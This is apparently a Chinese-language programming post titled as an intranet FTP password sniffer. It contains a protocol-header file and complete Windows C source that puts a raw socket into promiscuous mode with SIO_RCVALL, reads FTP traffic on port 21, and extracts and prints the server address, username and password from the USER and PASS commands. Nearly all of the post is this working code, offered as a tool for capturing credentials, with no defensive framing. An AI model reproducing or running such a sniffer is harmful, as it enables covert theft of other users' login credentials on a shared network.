内网FTPpassword嗅探

protoinfo.h

//////////////////////////////////////////////////
// protoinfo.h文件

/*

定义协议格式
定义协议中使用的宏

*/

#ifndef __PROTOINFO_H__
#define __PROTOINFO_H__

#define ETHERTYPE_IP 0x0800
#define ETHERTYPE_ARP 0x0806

typedef struct _ETHeader // 14字节的以太头
{
UCHAR dhost[6]; // 目的MAC地址destination mac address
UCHAR shost[6]; // 源MAC地址source mac address
USHORT type; // 下层协议类型，如IP（ETHERTYPE_IP）、ARP（ETHERTYPE_ARP）等
} ETHeader, *PETHeader;

#define ARPHRD_ETHER 1

// ARP协议opcodes
#define ARPOP_REQUEST 1 // ARP 请求
#define ARPOP_REPLY 2 // ARP 响应

typedef struct _ARPHeader // 28字节的ARP头
{
USHORT hrd; // 硬件地址空间，以太网中为ARPHRD_ETHER
USHORT eth_type; // 以太网类型，ETHERTYPE_IP ？？
UCHAR maclen; // MAC地址的长度，为6
UCHAR iplen; // IP地址的长度，为4
USHORT opcode; // 操作代码，ARPOP_REQUEST为请求，ARPOP_REPLY为响应
UCHAR smac[6]; // 源MAC地址
UCHAR saddr[4]; // 源IP地址
UCHAR dmac[6]; // 目的MAC地址
UCHAR daddr[4]; // 目的IP地址
} ARPHeader, *PARPHeader;

// 协议
#define PROTO_ICMP 1
#define PROTO_IGMP 2
#define PROTO_TCP 6
#define PROTO_UDP 17

typedef struct _IPHeader // 20字节的IP头
{
UCHAR iphVerLen; // 版本号和头长度（各占4位）
UCHAR ipTOS; // 服务类型
USHORT ipLength; // 封包总长度，即整个IP报的长度
USHORT ipID; // 封包标识，惟一标识发送的每一个数据报
USHORT ipFlags; // 标志
UCHAR ipTTL; // 生存时间，就是TTL
UCHAR ipProtocol; // 协议，可能是TCP、UDP、ICMP等
USHORT ipChecksum; // 校验和
ULONG ipSource; // 源IP地址
ULONG ipDestination; // 目标IP地址
} IPHeader, *PIPHeader;

// 定义TCP标志
#define TCP_FIN 0x01
#define TCP_SYN 0x02
#define TCP_RST 0x04
#define TCP_PSH 0x08
#define TCP_ACK 0x10
#define TCP_URG 0x20
#define TCP_ACE 0x40
#define TCP_CWR 0x80

typedef struct _TCPHeader // 20字节的TCP头
{
USHORT sourcePort; // 16位源端口号
USHORT destinationPort; // 16位目的端口号
ULONG sequenceNumber; // 32位序列号
ULONG acknowledgeNumber; // 32位确认号
UCHAR dataoffset; // 高4位表示数据偏移
UCHAR flags; // 6位标志位
//FIN - 0x01
//SYN - 0x02
//RST - 0x04
//PUSH- 0x08
//ACK- 0x10
//URG- 0x20
//ACE- 0x40
//CWR- 0x80

USHORT windows; // 16位窗口大小
USHORT checksum; // 16位校验和
USHORT urgentPointer; // 16位紧急数据偏移量
} TCPHeader, *PTCPHeader;

typedef struct _UDPHeader
{
USHORT sourcePort; // 源端口号
USHORT destinationPort;// 目的端口号
USHORT len; // 封包长度
USHORT checksum; // 校验和
} UDPHeader, *PUDPHeader;

#endif // __PROTOINFO_H__


#include <winsock2.h>
#include <stdio.h>
#include <mstcpip.h>
#include "../common/protoinfo.h"
#pragma comment(lib, "WS2_32.lib")
#pragma comment(lib, "Advapi32.lib")

void GetFtp(char *pData, DWORD dwDestIp)
{
char szBuf[256];
static char szUserName[21];
static char szPassword[21];

if(strnicmp(pData, "USER ", 5) == 0)
{
sscanf(pData + 4, "%*[ ]%s", szUserName);
}
else if(strnicmp(pData, "PASS ", 5) == 0)
{
sscanf(pData + 4, "%*[ ]%s", szPassword);

wsprintf(szBuf, " Server Address: %s; User Name: %s; Password: %s; \n\n",
::inet_ntoa(*(in_addr*)&dwDestIp), szUserName, szPassword);

printf(szBuf); // 这里您可以将它保存到文件中
}
}

void DecodeIPPacket(char *pData)
{
IPHeader *pIPHdr = (IPHeader*)pData;

int nHeaderLen = (pIPHdr->iphVerLen & 0xf) * sizeof(ULONG);

switch(pIPHdr->ipProtocol)
{
case IPPROTO_TCP:
{
TCPHeader *pTCPHdr = (TCPHeader *)(pData + nHeaderLen);
switch(::ntohs(pTCPHdr->destinationPort))
{
case 21: // ftp协议
{
GetFtp((char*)pTCPHdr + sizeof(TCPHeader), pIPHdr->ipDestination);
}
break;

case 80: // http协议...
case 8080:

break;
}
}
break;
case IPPROTO_UDP:
break;
case IPPROTO_ICMP:
break;
}
}

void main()
{

WSADATA wsaData;
WORD sockVersion = MAKEWORD(2, 0);
WSAStartup(sockVersion, &wsaData);

// 创建原始套节字
SOCKET sRaw = socket(AF_INET, SOCK_RAW, IPPROTO_IP);

// 获取本地IP地址
char szHostName[56];
SOCKADDR_IN addr_in;
struct hostent *pHost;
gethostname(szHostName, 56);
if((pHost = gethostbyname((char*)szHostName)) == NULL)
return ;

// 在调用ioctl之前，套节字必须绑定
addr_in.sin_family = AF_INET;
addr_in.sin_port = htons(0);
memcpy(&addr_in.sin_addr.S_un.S_addr, pHost->h_addr_list[0], pHost->h_length);

printf(" Binding to interface : %s \n", ::inet_ntoa(addr_in.sin_addr));
if(bind(sRaw, (PSOCKADDR)&addr_in, sizeof(addr_in)) == SOCKET_ERROR)
return;

// 设置SIO_RCVALL控制代码，以便接收所有的IP包
DWORD dwValue = 1;
if(ioctlsocket(sRaw, SIO_RCVALL, &dwValue) != 0)
return ;

// 开始接收封包
printf(" \n\n begin to monitor ftp password... \n\n");
char buff[1024];
int nRet;
while(TRUE)
{
nRet = recv(sRaw, buff, 1024, 0);
if(nRet > 0)
{
DecodeIPPacket(buff);
}
}

closesocket(sRaw);
WSACleanup();
return;
}